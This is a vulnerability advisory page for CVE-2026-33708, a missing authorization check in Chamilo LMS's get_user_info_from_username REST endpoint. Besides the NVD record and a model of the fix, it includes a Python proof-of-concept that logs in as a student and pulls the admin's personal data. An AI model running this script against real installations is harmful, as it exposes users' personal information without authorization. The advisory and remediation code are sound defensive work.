Security Vulnerability Report
CVE-2026-33708 CVSS 6.5 MEDIUM

Published: 2026-04-10 19:16:24
Last Modified: 2026-04-16 18:25:16

Description

Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38.
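The flaw described above is a missing authorization check (CWE-862 in the NVD record below): the endpoint confirms that the caller is logged in but never asks whether that caller is allowed to read the requested profile. The following is an added illustration, not Chamilo's own code: a stand-alone Python model of the endpoint with an in-memory user table (constructed here), showing the pre-1.11.38 behaviour next to a hardened handler. The field names, the `Forbidden` exception and the "admin or self" policy are assumptions chosen for the example; the real fix is in the referenced commit.

```python
from dataclasses import dataclass


# Constructed in-memory user table standing in for the Chamilo user database.
@dataclass(frozen=True)
class User:
    user_id: int
    username: str
    firstname: str
    lastname: str
    email: str
    active: bool
    is_admin: bool = False


USERS = {
    u.username: u
    for u in (
        User(1, "admin", "Site", "Admin", "admin@example.test", True, is_admin=True),
        User(42, "student_user", "Stu", "Dent", "stu@example.test", True),
        User(43, "other_student", "Oth", "Er", "other@example.test", False),
    )
}


class Forbidden(Exception):
    """Raised when the caller is authenticated but not authorized (HTTP 403)."""


def _profile(u: User) -> dict:
    # Exactly the fields the advisory says the endpoint returns.
    return {
        "id": u.user_id,
        "email": u.email,
        "firstname": u.firstname,
        "lastname": u.lastname,
        "active": u.active,
    }


def get_user_info_vulnerable(caller: User, username: str) -> dict:
    """Behaviour described for < 1.11.38: authentication only, no authorization.

    `caller` is accepted but never consulted, so any logged-in student can read
    any other account, including the site administrator.
    """
    return _profile(USERS[username])


def authorized(caller: User, username: str) -> bool:
    """Example policy (an assumption): admins may read anyone, users only themselves."""
    return caller.is_admin or caller.username == username


def get_user_info_fixed(caller: User, username: str) -> dict:
    """Hardened handler: decide on authorization before touching the user table.

    Checking the policy first means a non-admin gets the same Forbidden for an
    existing username and a missing one, so the endpoint cannot be used as a
    username-enumeration oracle either.
    """
    if not authorized(caller, username):
        raise Forbidden("not authorized to read user %r" % username)
    target = USERS.get(username)
    if target is None:
        raise KeyError(username)  # 404 only reachable by callers allowed to ask
    return _profile(target)


if __name__ == "__main__":
    student = USERS["student_user"]
    print("vulnerable:", get_user_info_vulnerable(student, "admin"))
    try:
        get_user_info_fixed(student, "admin")
    except Forbidden as e:
        print("fixed:", e)
```

The ordering in `get_user_info_fixed` (policy first, lookup second) is the part worth copying: an authorization check placed after the database lookup still leaks whether the account exists through the difference between a 403 and a 404.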

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* - VULNERABLE
Chamilo LMS < 1.11.38
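The CPE entry above is an open-ended range with only `versionEndExcluding: "1.11.38"`, so deciding whether a deployment is affected comes down to a correct version comparison. The following is an added helper, not part of the page or the NVD tooling, that applies such a match entry to an installed version string; it compares components numerically, because a plain string comparison ranks "1.11.4" above "1.11.38" and would wrongly clear a vulnerable install. The match dict is copied from the configuration above; support for `versionStartIncluding` and `versionEndIncluding` keys is added for generality and is an assumption about the NVD schema beyond what this page shows.

```python
import re

# Affected-range entry copied from the CPE configuration on this page.
AFFECTED = {
    "criteria": "cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*",
    "versionEndExcluding": "1.11.38",
}


def version_key(version: str) -> tuple:
    """Turn "1.11.38" into ((1, ""), (11, ""), (38, "")) for numeric comparison.

    A trailing non-numeric suffix such as "rc1" is kept as a string so that
    "1.11.38rc1" sorts after "1.11.38" rather than raising.
    """
    key = []
    for part in re.split(r"[.\-]", version.strip()):
        m = re.match(r"(\d+)(.*)$", part)
        if not m:
            raise ValueError("unparseable version component %r in %r" % (part, version))
        key.append((int(m.group(1)), m.group(2)))
    return tuple(key)


def is_affected(installed: str, match: dict = AFFECTED) -> bool:
    """Return True if `installed` falls inside the range described by `match`."""
    k = version_key(installed)
    if "versionStartIncluding" in match and k < version_key(match["versionStartIncluding"]):
        return False
    if "versionEndIncluding" in match and k > version_key(match["versionEndIncluding"]):
        return False
    if "versionEndExcluding" in match and not k < version_key(match["versionEndExcluding"]):
        return False
    return True


if __name__ == "__main__":
    for v in ("1.11.37", "1.11.38", "1.11.4", "1.10.8"):
        print(v, "affected" if is_affected(v) else "fixed/not in range")
```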

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration (placeholder host; the endpoint path is as given in this PoC)
target_host = "http://example.com"
api_endpoint = "/main/webservices/registration/rest.php"

# Attacker's low-privilege credentials (any authenticated account, e.g. a student)
username = "student_user"
password = "password"


def exploit():
    session = requests.Session()

    # Step 1: Authenticate to get a valid session cookie
    print("[*] Attempting to login as: {}".format(username))
    login_data = {"username": username, "password": password}
    # Note: Login endpoint structure may vary based on Chamilo configuration.
    # A 200 only shows the request was accepted; a rejected login may also
    # return 200 with an error body, so the real check is the next request.
    login_resp = session.post(target_host + api_endpoint + "?action=login_user", data=login_data)
    if login_resp.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Login successful")

    # Step 2: Exploit the vulnerable endpoint to get 'admin' info
    target_victim = "admin"
    print("[*] Fetching info for user: {}".format(target_victim))
    # The vulnerable action: no authorization check on the requested username
    params = {"action": "get_user_info_from_username", "username": target_victim}
    vuln_resp = session.get(target_host + api_endpoint, params=params)
    if vuln_resp.status_code == 200:
        try:
            data = vuln_resp.json()
        except ValueError:
            # Non-JSON body (e.g. a login page) means the session is not valid
            print("[-] Got a 200 but no JSON body; login probably did not succeed")
            return
        print("[+] Exploit successful! Response:")
        print(data)
    else:
        print("[-] Request failed with status code: {}".format(vuln_resp.status_code))


if __name__ == "__main__":
    exploit()

References

https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2 (Patch)
https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33708", "sourceIdentifier": "[email protected]", "published": "2026-04-10T19:16:24.107", "lastModified": "2026-04-16T18:25:15.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.11.38", "matchCriteriaId": "A4D0C5D2-6FA0-4532-8E3D-4EA111A50621"}]}]}], "references": [{"url": "https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}